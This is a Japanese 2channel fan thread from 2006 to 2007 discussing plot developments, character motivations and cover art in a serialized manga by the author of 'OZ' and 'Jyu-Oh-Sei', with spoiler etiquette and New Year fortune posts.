以降話し合った描写がないまま、サー・トレヴァーの車(?)で
忍たちがそのまま朱鉦の家に戻ってるっぽいのはいいのか…。
それが「分かりあう日などこないんだろう」と言うことかな?

けどさ、その場は分かったと言っておいて、
ヘルのいないところで人にぐちぐち言いながら手のひら返すの、
忍があんまり不誠実すぎるように見えてイライラするんだよな…
自分はこんなに考えているのに、かわいそうな僕ちゃんと
もなたちにアピールする前にヘルにその考えていることを言えと小一時間。

ぶっちゃけ、ヘルがりなの件でダブルスタンダードやり始めても
自業自得(りなでなく、忍のね)としか思えない。
(りなはいい面の皮だが)

121 :花と名無しさん:2006/11/26(日) 04:20:21 ID:???0
忍がヘルに直接言っていることと他の人たちにグチグチ言っていることと、違っているからイラつくのは同意。
ヘルがダブルスタンダードな行動に出ても、どっちもどっちだよな。

ただ、りなに関しては自分の無茶な要求で周囲に迷惑を掛け捲っているから、同情できない。
忍と極めてお似合いかも…という感想ぐらいしか浮かばない。

ただ、もなは可哀想だ。今月号を読んで特にそう思う。
結局、二面性がなく周囲を気遣える心配りのできる子が割を食うのかな。

122 :花と名無しさん:2006/11/26(日) 04:51:45 ID:???0
もなや毛糸の扱いが微妙だよね。毛糸はなんかやってくれそうだからいいけど。

正直K2は好きなキャラだけど、ちょっと外見も性格も古い感じがする。
ああいう野生児っていまはあんまり受けそうにないのがきつい…
今更いうのもアレだけど

123 :花と名無しさん:2006/11/26(日) 05:07:53 ID:???0
香山さんがSMICを辞めて、ほっとしている。
忍はダウン、りなは監禁と来て、次は香山さんの口封じかと思ったから。
とりあえず虎口は逃れたな。

サーが何を企んでいるのかで、今後の忍の運命は変わるのか。

124 :花と名無しさん:2006/11/26(日) 11:55:44 ID:???O
現在の忍の対ヘル感情がよくわからない。
恐ろしいのは過去の子ヘルで、現在のヘルには尋常ならない変化が起こっていると
認識したはずなのに人工調節話聞いた途端にファビョって勝手にもうダメだ認定。
自分好みの答えしか受け取らず相手の話を聞かないのは忍も同じじゃ…。
怖さの次元は違えどやっぱり話が通じない相手だったとはいえ、
忍の反応はどう見ても面倒臭いからヘル自体全否定しちゃえ!に見えて萎え。
ワガママ小僧か。

125 :花と名無しさん:2006/11/26(日) 13:18:45 ID:???0
>>124
どうでも良いことだろうが『人口調節』じゃないか?
『人工調節』ならまた話が違ってくると思うのだが

126 :花と名無しさん:2006/11/26(日) 15:51:59 ID:???0
人口調節についても、忍はなんだか曖昧だね。

最初は兄ヘルが企んでいたと思って過去の姿と重ねて非難したが
今ヘルは兄ヘルではない、聞く耳を持つかも、だからじっくり話し合って真意を確かめると言ったのに
真意なんて全然確かめずに、「止めてください!」だけ。

しかも、人口調節について、どこまで知っていたんだ?
ヘルに髪を鷲掴みされた時、抽象的に聞かされたことだけじゃなかったのか?
サーの話はもっと進んでいるというか、具体的なんだが、いつの間にかそこまで知っていたんだ?

いや、別にいいよ。実は先にもっと聞かされていたというのでも。
しかしだとすると、先月号のもなの反応が解せない。
もなは忍からそこまで聞かされていなかったことになるが、人口調節のこと自体は
忍がヘルに会いに行く直前の言葉から解るように知っている。
つまり、読者と同じだけの情報を持っていることになるんだが。

127 :花と名無しさん:2006/11/26(日) 16:22:40 ID:???0
ヘル×忍(*´Д`)ハァハァ

128 :花と名無しさん:2006/11/26(日) 23:29:44 ID:???0
☆嵐のリーダー・大野智を応援しよう☆

ttp://www.youtube.com/watch?v=iVoyMQcdLy8
ttp://www.youtube.com/watch?v=brqlLHQNeJs
レベルの高いダンスの実力

ttp://www.youtube.com/watch?v=wIkOu0tnCQ4
ttp://www.youtube.com/watch?v=a-49XJT1li0
ナイスな天然ボケ具合

これほど非凡な才能を持ちながらイマイチ名の知れていない大野智。
動画はほんの一部です。まだまだたくさんの大野の面白動画があります。
動画を観て彼を気に入ったらどんどん彼の素晴らしさを普及しよう。
2chの力で大野をメジャーなアイドルへ!

嵐の大野智を応援してあげようぜ
http://ex17.2ch.net/test/read.cgi/news4vip/1164456153/


129 :花と名無しさん:2006/11/27(月) 21:57:57 ID:???0
もなとK2、お手て繋いで仲良しの図、はもう終わりそうなかんじだね。
ちょっと切ないけど展開としては面白くなってきた。

130 :花と名無しさん:2006/11/27(月) 22:52:02 ID:???0
来月はK2vsヘルかvs赤龍か
どこまで進むかわからないけど怒涛の展開ぽくて楽しみ

9巻はミカ表紙で1巻以来だし嬉しいんだけど、
そういや扉とかでも忍って単品で表紙になったことがあったかな、と気になった。
デーモンの表紙ってわりと派手で、他作品ならともかく忍単品だと
あまり花が無いからかなー。まありなとペア表紙で良いんだけどw

131 :花と名無しさん:2006/11/28(火) 00:47:38 ID:???0
姑息に忍とのツーショットを狙うヘル

132 :花と名無しさん:2006/11/28(火) 01:00:13 ID:???0
贅沢を言えば、侑&萩カラーを表紙にして欲しかったなあ。
萩がピーな巻でしょ、9巻て。

133 :花と名無しさん:2006/11/28(火) 01:56:20 ID:???0
自分もそう思った。もうこの巻ぐらいしかないし>侑&萩カラー
単行本の表紙になれるのは群像劇の中でも一軍クラスだけなのかな
閨人、ゾフィ、侑と萩なんかは確かに重要度がちょっと落ちるし

134 :花と名無しさん:2006/11/28(火) 15:55:40 ID:???0
侑&萩の表紙にしてほしかったの同意
コミクスの広告とか見ると侑&萩のエピを出してるし・・・
ミカはミカでいいんだけどさ(ミカ最後ってことはないと信じたい)


135 :花と名無しさん:2006/11/29(水) 17:06:12 ID:???0
そういや花咲けでクインザさんが表紙になったのはお亡くなりになった巻でしたっけ?

136 :花と名無しさん:2006/11/29(水) 17:40:38 ID:???0
今見るとハリーはともかくよく寅之介が表紙になったなぁ、と思う。
あと、立人ラブの人は表紙になるほど活躍しなかったよなぁ、とか。

137 :花と名無しさん:2006/11/29(水) 18:06:56 ID:???0
花鹿の恋敵役だったけど、ちっとも立人と花鹿の邪魔する娘なんだという
不安感なかったね
リンリー本人より、曹が頑張ってたから?w

138 :花と名無しさん:2006/11/30(木) 17:19:51 ID:???0
コミックスを無理矢理貸して読ませた友人はリンリーの表紙見て「この巻だけ少女漫画っぽい」っていってた。

ツァオさんって活躍の割りに表紙にならなかったよね?
寅之介が表紙になったのは可愛いハンサムボーイという初期設定があったからかな?

139 :花と名無しさん:2006/11/30(木) 18:00:06 ID:???0
そういや寅之介も美少年設定だったんだなぁ・・・・
最初のほんの数話しか保たなかったけど

140 :花と名無しさん:2006/11/30(木) 18:13:32 ID:???0
自分でも言ってたけどずーっとギャグ顔だったねぇ。あと手がグローブ。
表紙になったのは樹さんが気に入ってたからかと思ってたよ

141 :花と名無しさん:2006/11/30(木) 23:37:34 ID:???0
ギャグキャラつまんないから止めればいいのにと思う

142 :花と名無しさん:2006/12/01(金) 00:20:29 ID:???0
描くのが楽なんでしょう…。

花咲け話に花咲いてるトコ悪いんだけど
今月号どうしても気になることがある。
それは時間軸。

閨人の発言からすると、作中、6/10過ぎてない。
てことは、同日誕生日の姉妹だってまだ誕生日迎えてない。
エットーレの16歳発言は、年度で16歳だからいいけど、
K2と閨人の年齢云々のエピソードのとき、
もなは16歳じゃなくて15歳と言わなきゃ変。

143 :花と名無しさん:2006/12/01(金) 00:47:55 ID:???0
ゾフィはギャグキャラなのか、まだシリアス保っているのかどっちだ…
>>142
今まで6月10日過ぎてると思ったけど、映画撮影とか含めて4月下旬ぐらいかな。
年齢云々はもなだけ歳とってk2の見た目年齢と差がついてしまう、というエピだよね
良く覚えてないけど高校生ぐらいならあまり年齢に括らないだろうと
もうすぐ16歳という感じで描いたのかなあ
まあデーモンは割と年齢大事だし、9巻でしれーっと直ってるかもよ

144 :花と名無しさん:2006/12/01(金) 20:08:51 ID:???0
>>143
レスthx、直ってるといいなあ。

145 :花と名無しさん:2006/12/03(日) 13:10:21 ID:???0
いずれにしてももうすぐ16ならもう高校生だよね?
ララの登場人物紹介のところが中学生になってるんだけど、
制度違うんだっけ?

146 :花と名無しさん:2006/12/04(月) 13:22:30 ID:???0
そりゃミスじゃない?
連載開始時が中学生だったから。

147 :花と名無しさん:2006/12/04(月) 20:32:46 ID:???0
9月新学期設定なら作中に描くだろうし、書いてる担当のミスでしょ。

新刊
ttp://www.s-book.com/plsql/com2_detail?isbn=459217819X
この色が3巻続くのか。切りが良いのは今連載しているのも含めて12巻か13巻かなあ。

148 :147:2006/12/04(月) 20:36:09 ID:???0
”完結巻として、切りが良いのは”ってことで。連投スマソ

149 :花と名無しさん:2006/12/05(火) 23:53:42 ID:???0
新刊良かったー。どう畳むのか、ハゲシク楽しみ。
ハッピーエンドが良いなあ。

150 :花と名無しさん:2006/12/06(水) 21:33:04 ID:euUDxYEZ0
面白かったー。10巻がまちどうしい....



151 :花と名無しさん:2006/12/06(水) 21:47:13 ID:???0
「竹石圭佑」って何?知ってる人いる?
っていうかコイツ、名古屋の成人式に出るの?

152 :花と名無しさん:2006/12/06(水) 21:50:39 ID:???0
>>147
ちょwwwwコミックス派で久々にスレ覗いて
そこ開いたらおもっきしネタバレwwwwwwヒドス

153 :花と名無しさん:2006/12/06(水) 22:10:31 ID:???0
ネタバレはオフィシャルのWORKSやコミックスの裏にも書いてある罠

154 :花と名無しさん:2006/12/07(木) 23:10:40 ID:???O
久々に既刊読み返したけど
K2超癒し系…
失礼だが、七地に通じる能天気さと言うか何というか

155 :花と名無しさん:2006/12/08(金) 15:53:14 ID:???O
新刊 センセまんまとジャニに填まってる
やだなぁ

156 :花と名無しさん:2006/12/08(金) 18:42:57 ID:???0
あれくらい持ち上げるのは普通だろう

157 :花と名無しさん:2006/12/08(金) 20:41:20 ID:???O
始めて獣王星見た。見んな死ぬのは悲しかった。

158 :花と名無しさん:2006/12/09(土) 11:57:44 ID:???0
( ゚д゚)


( ゚д゚ )コッチミンナ?

159 :花と名無しさん:2006/12/10(日) 01:32:31 ID:???0
>>158
ワロス

160 :花と名無しさん:2006/12/11(月) 19:11:15 ID:???0
>>155
そうかな。私は光一を褒めないで、小栗旬はベタ褒めしてたのが
気になった。光一の容姿は趣味じゃないのね、と。
小栗旬やミズキナナはかっこいい可愛いってわざわざ書いてるのに
光一だけ・・・・

161 :花と名無しさん:2006/12/11(月) 19:31:01 ID:???0
あまり具体的な声優話は荒れやすいから勘弁・・・

162 :花と名無しさん:2006/12/12(火) 00:36:03 ID:???0
コミックス派だけどネタバレOKなんで、萩の事は知ってたけど新刊見たら泣けた。

163 :花と名無しさん:2006/12/12(火) 15:55:44 ID:???0
病院で読むもんじゃないな、9巻は…
すぐにヤバいと片付けたが
危うく恍惚のシーンで号泣しかけた
今は家で2回目の号泣を迎えたところだったりする

164 :花と名無しさん:2006/12/13(水) 23:24:55 ID:???O
新刊GET
りなの選択、正しいかわからんが、あれで良かった、と思った。
なんだかんだで。お節介なトコもあるけどりな好きだ。りなもなは珍しく樹作品で好感持てるヒロインだよね。
愁さんの恍惚も泣いたけど侑くんの
「世界で一番好きって思われたことある?僕はあるよ」てのがぐっと来た。

私は無いーorz

10巻楽しみだ。ヘルムートがなんなのか早くしりたい!

165 :花と名無しさん:2006/12/14(木) 23:21:02 ID:???0
>>163
「恍惚のシーン」…
ついお花畑になっちゃったお爺様を想像しちゃった、すんません

166 :花と名無しさん:2006/12/15(金) 04:05:01 ID:???0
ミカって異界に逃げたとしたらそこで礼奈に会ってたりはしないかな
そうだといいのにな

ところで礼奈がなんでミカに聖典として死を与えなかったかとちょっと考えたんだけど
礼奈って元々身寄りがない身の上だし『母』としての愛のがミカへのそれより勝ってたんじゃないだろうか
それで順位的に母として愛してる双子には勝てないから「愛してる」と言ってたのにミカは死ななかった

もしこれが当たってたとして、それを知ったらミカが双子の敵に回ったりして
異界に逃亡してるんなら鎖を切ってるってことだし
しかし味方のミカもたまに怖いのに敵になんかなったりした日には…
想像するだけでも怖いなあ

ところでヘルムートの名前の中にヘルが入ってるのがなんともいえない
そこだけとると「地獄」とか「死」とかの意味があるし
忍に地獄を見せるヘルとか色々想像してある意味ピッタリかもと思ってしまうw

167 :花と名無しさん:2006/12/15(金) 08:14:07 ID:???0
ヘルメット?

168 :花と名無しさん:2006/12/15(金) 14:06:37 ID:???0
ヘルムートがあんな性格だからってことじゃないの?

それより167のおかげで
工事現場でヒーコラいいつつ働く忍を
麗しくニヤリ笑いしながら見守ってるヘルメットかぶった現場監督ヘルを妄想してしまった
どうしてくれるw

169 :花と名無しさん:2006/12/15(金) 21:55:18 ID:???0
>>168の想像力に嫉妬w

170 :花と名無しさん:2006/12/16(土) 00:12:27 ID:???0
不粋な話で恐縮だが、「ヘルムート」はドイツ人名だから、
ドイツ語で考えたほうがよろし。
ドイツ語では「朗らかな騎士」の意味になるらしい。
日本人で言うなら「武朗」みたいな感じ?

「ヘル」だと、「憎いあんチクショウ」(byドイチュ)みたいな…。
忍はヘル・ムートっていちいち分けて発音してるっぽいから
いいんじゃないかしらと一人ニラニラしてみたり。

171 :花と名無しさん:2006/12/16(土) 00:54:25 ID:???0
武朗ワロスw

ヘルムートって名前は「ヘルムート・バーガー」が名付け元、
ってことであってるなぁ、と思ってる。映画は観てないけど雰囲気的に。
そういや最初名前がでてきたとき、先生お馴染みのおっさんキャラだと思ったな…

172 :花と名無しさん:2006/12/16(土) 00:56:35 ID:???0
シスコンの俳優の変態写真家ですか?>バーガー氏
某サッカー漫画思い出したおw

173 :花と名無しさん:2006/12/16(土) 18:05:03 ID:???0
あれはWバーガーw

174 :花と名無しさん:2006/12/16(土) 21:08:35 ID:???0
んじゃヘルムートはブラコンの金持ちの変態博士でおk?

175 :花と名無しさん:2006/12/16(土) 22:19:12 ID:???0
私は、ヘル→地獄 ムート→ファイナルファンタジーとかに
でてくる最強の龍の召喚獣をバハムートというので
それをくっつけただけかもオモタw

176 :花と名無しさん:2006/12/16(土) 22:23:22 ID:???0
ヘルムートってよくありそうな名前じゃん
ヘルムート・ラング
ヘルムート・ニュートン

177 :花と名無しさん:2006/12/16(土) 22:48:54 ID:???0
公式更新きたよー
この前の更新が遅かったのは年末進行だからかな

178 :花と名無しさん:2006/12/17(日) 04:03:01 ID:???0
>>176
ヘルムート・レンネンカンプ

179 :花と名無しさん:2006/12/18(月) 15:17:00 ID:???0
ミスターレンネンか!

180 :花と名無しさん:2006/12/18(月) 18:41:02 ID:???O
ヘルニート

181 :花と名無しさん:2006/12/19(火) 17:08:31 ID:???0
>>166
そもそもレナの彼氏の死因になっている時点で、
ミカに勝ち目ない気がする。

182 :花と名無しさん:2006/12/19(火) 19:53:47 ID:???0
ミカは双子の敵にはなってほしくないなぁ
今までも悲壮な未来が待ってそうだったのに、もっと悪い方に行きそう。

>>166
やっぱり子供を一応一番に考えるであろう親とか、恋人とかがいる年代よりも
子供のほうが楽なんだろうなぁ、いろいろと

183 :花と名無しさん:2006/12/19(火) 20:37:24 ID:???0
>181
旦那が消えた後にレナに触られていたらミカじゃなくて旦那に変化できて
愁みたいに最終的には、違うってわかっていたけどそれでもそばに居て欲しかった
今はあなたが一番好きパターンで恍惚の死を迎えられたかもね。

184 :花と名無しさん:2006/12/19(火) 21:24:17 ID:???0
しかし旦那の容姿で、立ち居振る舞いがミカだよ?
違和感バリバリ。性格&人格、違いすぎ。
到底、旦那と同一視できないと思うな…。

萩は粗雑っぽいところが本体と似ていたから
最初は本物の兄と思い込む→あれ、何か違うかも→違ってもいい、好きだよ!
って流れになったが、ミカの場合は苦しそうだ。

185 :花と名無しさん:2006/12/19(火) 21:42:45 ID:???0
双子の会話や過去話を読むと結構旦那のふりが出来てたとは思うけどなあ。
礼奈は頭がおかしくなってたし、顔が同じなら信じ込ませることは出来たと思う。
それでも結局恍惚の死は得られませんでした、ってオチだと思うけど。
最愛の人と同じ顔で駄目、ってのも辛いな。

186 :花と名無しさん:2006/12/19(火) 22:53:56 ID:???0
つーか、顔が同じだけの全くの別人を最愛の人と勘違いして、恍惚の死が得られるものなのか?
やっぱり侑の
>最初は本物の○○と思い込む→あれ、何か違うかも→違ってもいい、好きだよ!
パターンでないと、恍惚の死は無理な希ガス


187 :花と名無しさん:2006/12/19(火) 23:54:38 ID:???0
まあな。例えば、もながK2のことを閨人と同一視して、いくらラブっても
K2が果たして恍惚の死を得られるかってことだ。

気になるきっかけはそっくり要素でいいが、その後、どれだけそのデーモン本人をそれ自身として愛せるかってことだと思う。

188 :花と名無しさん:2006/12/20(水) 00:11:25 ID:???O
りなもなパパの姿になったミカって、体操のお兄さんをちょいハンサム・爽やかにした感じかな

189 :花と名無しさん:2006/12/20(水) 00:21:53 ID:???0
体操のお兄さんをハンサムにするのは大変そうだ。

190 :花と名無しさん:2006/12/20(水) 00:31:33 ID:???0
某所にバレ北
ネタバレ解禁日に、スレが伸びそうだぞ…

って今月の解禁はいつだ?

191 :花と名無しさん:2006/12/20(水) 01:36:51 ID:???0
パパは作画の微妙なプロローグだけの出演で終わりなのだろうか…

192 :花と名無しさん:2006/12/20(水) 17:06:02 ID:???0
>>190
バレ読んだ。やっぱりなという展開に萎え
よーするにOZの状態なワケだな今はw

193 :花と名無しさん:2006/12/20(水) 19:17:01 ID:???0
真実に気づけないオレガイル

194 :花と名無しさん:2006/12/20(水) 20:08:57 ID:???0
早バレの感想はやめとこうや

195 :花と名無しさん:2006/12/20(水) 21:06:10 ID:???0
今月は22日正午ネタバレ解禁。早バレ感想もそれまでは禁で。

196 :花と名無しさん:2006/12/21(木) 00:33:45 ID:???0
>>189
でも最近のお兄さんには結構萌えてるw

バレ気になる…が我慢

197 :花と名無しさん:2006/12/21(木) 15:01:01 ID:???0
個人的に、最終的に礼奈はミカをちゃんと認識してて愛してもいたけど
やっぱり旦那がミカ(の同種)のせいで死んだ事も許せなくて、
その思いが精神的混乱に拍車をかけた結果、
何年経っても時々ミカが旦那に見えてたんじゃないかなと妄想膨らませてる。

真実の愛はあるけどそれがミカに対して言葉にされる事はなく、
言葉があるときはミカへの真実の愛がない、そんなジレンマはどうですか。

198 :花と名無しさん:2006/12/21(木) 17:28:34 ID:???0
早く感想書きたい

199 :花と名無しさん:2006/12/21(木) 22:50:13 ID:???0
>>196
お兄さんは髪型と服装をどうにかするのが先決だ。

と書こうとして、あの服装じゃなくなったら体操のお兄さんのステイタスを失ってしまうことにガクブルした。
困ったな。

200 :花と名無しさん:2006/12/22(金) 14:21:14 ID:???0
解禁なので書く。以下ネタバレ


子供のヘルが出てきたからOZの
リオンの子供バージョンみたいじゃんねw
こっちが赤龍本体だとして、あの大人ヘルは
本物のヘルで、唾棄すべく有色人種の滅亡をたくらみ
赤龍と取引をしたんじゃないかと考える。
それと9巻を読んで思ったんだが
グリフィンが恍惚を得て、消滅した時、魂みたいなのが出てたよな。
あれが何らかの形で、ユウが危険になった時復活したりしないだろうか。
それが聖典の特権つうかさ。
最後にミカ。襲ってくるティーヴァたちに
「もっとも悪魔という名に近いもの」と言っているが
ここでそれを強調するということは、やはり何かを企んでいて
ラスボスはミカ?みたいなカンジもする。ラスボスとはいかないまでも
オズで言うなら、シドニーダンドリー博士のような
立場になるんじゃないかと思う。以上長文スマン

201 :花と名無しさん:2006/12/22(金) 14:24:39 ID:???0
あれ?今日発売日だったんだ。帰りによらねば

202 :花と名無しさん:2006/12/22(金) 14:49:19 ID:???O
とりあえず一言

来月のカラー予告、あんた誰w?

203 :花と名無しさん:2006/12/22(金) 18:55:01 ID:nflPuhDmO
大人ヘルは赤龍が作った幻なんじゃないかな?忍・周囲への態度の変化とかが本物だと説明つかないし。

204 :花と名無しさん:2006/12/22(金) 20:08:50 ID:???O
忍はどうしたんだろうか?
ヘルの毒気にでもあてられたのか?


205 :花と名無しさん:2006/12/22(金) 21:52:31 ID:???0
ネタバレ詳しくお願いしますm(_ _)m

206 :花と名無しさん:2006/12/23(土) 00:33:59 ID:???0
忍はヘルが何かして、具合を悪くしたんだろう
SMIC解体を強行に主張したからな
それ以上、主張させる気力をなくそうとしたんじゃね?

それを考えると、忍はやっぱり鎖か聖典なんだよなぁ
デーモンはその意思に絶対服従だから、SMICを使って目的を遂げたいヘルが
忍にその反対をさせないために…と思う

とすると解らないのか子ヘル
子ヘルはデーモンでないから、本当にそのまま大人になったのなら、反対する忍は消せばお終いなのに
消すことができないという時点で、デーモンっぽい

207 :花と名無しさん:2006/12/23(土) 06:41:25 ID:???0
自分で性能の良い自分(子ヘル)の分身を新たに作ったから
もうK2は用済みって攻撃したんじゃない?>赤龍の影

しかしそのおかげで忍の鎖(聖典)負担が増えたとか?
前にも出たが、忍は前から死にかけで、赤龍の力で
進行を遅らせてるだけ。だから林博士の不老不死研究を
許してるっていうのも関係あるのかなと

208 :花と名無しさん:2006/12/23(土) 15:53:57 ID:???0
一瞬、本当に忍は聖典でも鎖でもなかったんかい!と勘違いしそうになった。
でも忍はケロちゃんに触られても消えなかったし鎖確定だよな。

大人ヘルはヘル本人でも中身は赤龍に操られてるのかな。
忍曰く、現在のヘルに昔のような恐ろしさはない・言葉が通じないだけと言ってたし。

209 :花と名無しさん:2006/12/23(土) 17:27:29 ID:???0
>>208
大穴として、忍も赤龍の子孫とかいう可能性も。

210 :花と名無しさん:2006/12/23(土) 20:19:23 ID:???O
子孫とか血縁はないと思うな。次元が違う生命だし。
やっぱ忍が鍵なんだよね、この物語。
子ヘルは個人的にリオン臭がするから出てこないで欲しい…

211 :花と名無しさん:2006/12/23(土) 20:30:27 ID:???O
>>210
同意。
子ヘルはあくまでも体借りてるだけの存在でいてほしい。
確かに五歳の忍には恐怖だしあのまま成長したら物凄い悪人になってたかもしれないが、
子ヘルの時間は11歳で止まってるみたいだし、精神年齢高いキャラ達が
今更そんなガキのヒスに振り回されるのは「?」て感じ。

212 :花と名無しさん:2006/12/23(土) 20:53:23 ID:???0
なんか赤龍にやられて気配がなくなっても
ミカとK2はどっか別の場所に存在してそうな気がする
ミカは礼奈のことを思ってラリラリしてた伏線が
まだ回収できてないからあのまんまってことないだろうし
K2が屈辱の死でエンドだとそれこそ話が進まなそう

213 :花と名無しさん:2006/12/23(土) 22:37:25 ID:???0
ミカがある程度回復してK2を消滅寸前に別次元に隠した
ってのはどうだ。



214 :花と名無しさん:2006/12/24(日) 13:10:14 ID:???0
今月、香山さんが「こんなことならSMICに在籍していればよかった」と後悔していたが
忍がヘルに香山さんの名前を出してしまったからなぁ…。
もしまだSMICにいたら、ヤバいことになっていた希ガス。

しかし閨人が何かしてくれるのではないかと期待。
生中継場面でSMICの実態暴露とか。
これで世間の風向きが変わってくれたらなぁ。
このままだとSMICの実態を知らない一般人からは、トレヴァーや香山さんのレジスタンスは悪役だよ。

215 :花と名無しさん:2006/12/25(月) 07:08:45 ID:???0
忍の体調悪化だが、ケロちゃんの爪に遅効性の毒があって、今頃効いてきたというのはどうだ?
その場合、ヘルも慌てふためくことになるが

216 :花と名無しさん:2006/12/25(月) 12:29:35 ID:???O
ケロちゃんて毒持ってたっけ?
消滅回避しても毒でアボンなんて嫌だな

217 :花と名無しさん:2006/12/25(月) 17:27:21 ID:???0
以前、話題になった時に出た伝説では毒ありじゃなかったっけ?
デーモン世界ではどうだろうね
毒でアボンは確かにイヤンだが、忍は死んでやっとヘルから逃げられる&SMIC妨害できるという意見もあった記憶がw


218 :花と名無しさん:2006/12/25(月) 17:37:34 ID:???0
忍が本当に聖典だったら、そう簡単に死なせてくれるかなあ
体が死んでも脳みそタンク漬けにして生かされそうな悪寒

219 :花と名無しさん:2006/12/25(月) 21:03:49 ID:???0
脳みそあっても口と腹筋がないと言えないよw
脳が発する電気信号の「アイシテル」でもOKなんだろうか

220 :花と名無しさん:2006/12/25(月) 23:01:39 ID:???0
>>216
ケロちゃんは確か唾液に毒があった

221 :花と名無しさん:2006/12/25(月) 23:53:57 ID:???O
>>218-219
不謹慎だけどワロタw
でも、忍あぼんは嫌だなぁ。りながかわいそうだ(´・ω・`)
まあ、これから先、そのりなにも死亡フラグが立つ可能性がありそうだが…

222 :花と名無しさん:2006/12/26(火) 00:49:56 ID:???0
もし本当にK2が死んだなら、りな死亡のフラグが立ったな。
もながK2並みの別のデーモンを繋がない限りは。
まずあり得ない。

いろいろ検査されているりなが、突然わずかずつでも時間逆行し始めたなら、K2死亡はガチ。
またはこのスレで出ていたように、K2がハーフでデーモンの部分だけ消滅したか。
どっちにしても、りなの未来も暗い。


223 :花と名無しさん:2006/12/26(火) 13:47:49 ID:???O
ここでもなに
「りなかK2のどちらかを選べ、どちらかしか助からない」
みたいな選択を迫る嫌展になりませんように

224 :花と名無しさん:2006/12/26(火) 14:14:30 ID:???0
いや、りなとK2の両方助けられるか
りなとK2のどちらもあぼんかの2択しかないんじゃ?

225 :花と名無しさん:2006/12/26(火) 16:57:00 ID:???0
ミカ・K2行方不明、忍重体、りなの退行現象再発…という最悪の展開を想像した。

226 :花と名無しさん:2006/12/27(水) 15:55:28 ID:???0
K2が赤龍を食えば、赤龍の力とかはK2が受け継ぐし
最強のデーモンになった時に、
りなの時間が元に戻るんじゃなかろうか?
りなの時間を元に戻すには、それしかないキガス
同様にミカが赤龍を食えれば、
レナを復活させるだけの力を得られるとか
そういうのありそう。
いろんな意味で前作の何かが何にという
比べ方ができるマンガだから(子ヘルが子リオンのようにねw)
オズで核融合炉の爆発、獣王星でボール・・・のように
今回も何かを止める為に動くのかね。で、それはナニ?ww

227 :花と名無しさん:2006/12/27(水) 21:31:13 ID:???0
子ヘルがK2に、おまえはもういらない とか言ってるの見て、ヘル=赤龍かと思った。
子ヘルは、もともと赤龍が人間の振りしてたのかと。

228 :花と名無しさん:2006/12/28(木) 10:32:13 ID:???0
わかった。今回止めようと奮闘するのは
りなのリターンシンドロームかな?
加速していくりなの逆行を止める為?
イウァや30ナンバーのように邪魔をしてくるのが
別に出現する可能性もあるな。
そしてネイトやティズのように
「えっ」と思うような人が死ぬと。
その役割はゾフィのような気がしてきた。
ネイトもティズもタフだったから、
死ぬわけねーって思ってる人が死ぬんだろう。

229 :花と名無しさん:2006/12/28(木) 11:48:42 ID:???0
ネイトは死ぬかも、という気はしたよ。
戦い好きの冷血軍人が突然女にほだされちゃったりしてるし。フラグは立ってた。

わからないのがティズ。
カリムが死んじゃったから、バランス的に絶対生き残ると思ってた。
むしろチェンの方がやばいと思ってた。
つか、最後までラダが出てくるとは思ってなかったよ。
やっぱり獣王星はわからん。

230 :花と名無しさん:2006/12/28(木) 22:51:40 ID:???0
花咲ける青少年とOZの辺りが一番話的にも絵的にも好きだった。

231 :花と名無しさん:2006/12/28(木) 22:54:13 ID:???0
>>230 同じく。花咲ける6巻までの絵が一番好き

232 :花と名無しさん:2007/01/01(月) 13:30:28 ID:Rso89OSHO
保守あげ

233 : 【大吉】 【1165円】 :2007/01/01(月) 15:19:00 ID:???O
ヘルムートの運勢

234 : 【大吉】 【405円】 :2007/01/01(月) 16:01:50 ID:???0
忍の運勢w

235 : 【大吉】 【1900円】 :2007/01/01(月) 18:58:11 ID:???O
大吉続きW
↑毛糸の運勢と給料

236 : 【凶】 【185円】 :2007/01/01(月) 22:46:59 ID:???0
新刊待ち

237 : 【大吉】 【1877円】 :2007/01/01(月) 23:24:07 ID:???0
K2の運勢

238 : 【凶】 【988円】 :2007/01/01(月) 23:26:04 ID:???0
りなの運勢

239 : 【大吉】 【304円】 :2007/01/01(月) 23:39:09 ID:???0
おとぎ話

240 : 【末吉】 【458円】 :2007/01/01(月) 23:53:08 ID:???0
もなの運勢

241 :花と名無しさん:2007/01/02(火) 02:03:18 ID:???0
双子の運勢悪いなw
忍でさえ大吉なのに

242 :花と名無しさん:2007/01/02(火) 13:25:09 ID:???O
りな、危ないな…;

243 :花と名無しさん:2007/01/06(土) 20:01:42 ID:???0
このスレも危ないな…;

244 :花と名無しさん:2007/01/07(日) 15:05:05 ID:???0
思いつきばかりだから話が続かないんだよね。

子ヘルの件は、
私は大人ヘル(幻影)=子ヘル(本当の姿)と解釈した。
K2が「鎖」のもなの血の匂いから、りなの居場所を辿ったら
まっすぐ幻影に行きついてしまうくらいには、
精密な幻影を作れるんだから、ありえなくはないと思う。

にしてもなんつーか忍の自己中心振りが目についてきて、
クライマックス間近というのに
自分の中ではいまいち盛り上がらない…。

245 :花と名無しさん:2007/01/07(日) 15:23:35 ID:???0
自己中心ぶりならヘル様に叶うものはいないだろう
いや、あれは独裁者思考というのか
忍の自己中心(我儘)はヘル限定だから問題ない
きっとそこも含めて忍が毒盛りたくなるくらい忍が愛おしいんだよwwww

246 :花と名無しさん:2007/01/07(日) 16:30:56 ID:???0
問題大有りだよ…
そのヘルが現時点で最大の敵なんだから。
忍が出てくると話進まないなと思ってたけど
自己中に3歩進んで超自己中に3歩戻らされてじゃ
そりゃ進まないわ。
忍どうよって思う人がいても無理ない。
私はヘタレ万歳、ダメでなんぼな好みなんでOKだけどww
でももな応援。忍は応援し甲斐がないので。

247 :花と名無しさん:2007/01/07(日) 22:22:51 ID:???0
ちょっと前まで自分もそう考えていたが、今は逆だな。
とりあえずヘルから逃げずにぶつかっていってリタイアした忍はそれなりに認めるが、りなは…。
わざわざSMICに乗り込んだり、「私だけ逃げられない!」と言ったり、
K2がいてくれたら助けてもらえると当てにした挙句、
ミカが消滅して自分が捕まった辺りで、激しくモニョった。
利他的行動に見えるが、実は激しく自己中人間ではないのかと。



248 :花と名無しさん:2007/01/07(日) 22:57:46 ID:???0
本心から利他的ではあるんだろうけど、周りにまで利他的である事を
強要してるように見えるから色々突っ込みたくなるんだよな
圧倒的カリスマで巻き込むんでも知略を巡らすんでもなく、
ただイヤイヤ言ってるだけだから余計に

「聖母」は皮肉で、今後の展開でりなが自分の半端な聖母ぶりを
反省する(八雲のしをり的展開)ことになるのかと思ってたけど…
どうなんだろうなあ

249 :花と名無しさん:2007/01/08(月) 01:30:55 ID:???O
まあ目の前の人を見捨てられないってやさしさはりなのいいところだし、
そんなやさしいりなが根気強く仲良くなろうと頑張ってくれたから忍も救われたんだし
